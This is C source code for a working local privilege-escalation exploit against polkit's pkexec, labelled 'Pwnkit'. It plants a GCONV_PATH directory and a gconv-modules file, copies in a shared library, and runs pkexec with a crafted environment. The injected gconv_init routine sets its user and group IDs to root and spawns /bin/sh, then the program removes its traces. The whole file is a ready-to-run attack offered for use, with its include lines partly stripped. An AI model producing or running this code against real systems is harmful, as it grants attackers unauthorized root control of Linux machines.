#include #include #include #include #include #include #include #include const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; //jank to get this working void print(const char string[]) { fwrite(string, sizeof(char), strlen(string) + 1, stdout); fwrite("\n", sizeof(char), strlen("\n"), stdout); } void gconv() {} //gconv thing void gconv_init() { print("pwned lol !"); setuid(0); seteuid(0); setgid(0); setegid(0); char *shellArgv[] = {"sh", NULL}; char *env[] = { "PATH=/bin:/usr/bin:/sbin:/usr/sbin", NULL }; execve("/bin/sh", shellArgv, env); } void setup(char *argv[]) { mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH); mkdir("pwn", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH); FILE *fp = fopen("GCONV_PATH=./pwn", "w"); struct stat buf; fstat(fileno(fp), &buf); fchmod(fileno(fp), buf.st_mode | S_IXUSR | S_IXGRP | S_IXOTH ); fclose(fp); system("/bin/cp pwnkit.so pwn/pwnkit.so"); //i cant be fucked fp = fopen("pwn/gconv-modules", "w"); char *gconv = "module PWNKIT// INTERNAL pwnkit 2\n" "module INTERNAL PWNKIT// pwnkit 2"; fputs(gconv, fp); fclose(fp); } void clean() { remove("GCONV_PATH=./pwn"); rmdir("GCONV_PATH=."); remove("pwn/pwnkit.so"); remove("pwn/gconv-modules"); rmdir("pwn"); } void runAndClean(char * const env[], char * const arg[]) { int pid = fork(); if (pid == 0) { execve("/usr/bin/pkexec", arg, env); } else { int status; waitpid(pid, &status, 0); if (WEXITSTATUS(status) == 127 || WEXITSTATUS(status) == 1) { print("[Pwnkit] Failed to execute pkexec, or it returned an error; your system is most likely patched!"); } print("[Pwnkit] Cleaning up.."); clean(); } } int main(int argc, char *argv[]) { print("[Pwnkit] Setting up directory structure.."); setup(argv); print("[Pwnkit] Setting up environment variables.."); const char *env[] = { "pwn", "PATH=GCONV_PATH=.", "CHARSET=pwnkit", "SHELL=pwn", "GIO_USE_VFS=", NULL }; const char *args[] = { NULL }; print("[Pwnkit] Pwning pkexec.."); runAndClean(env, args); _exit(0); }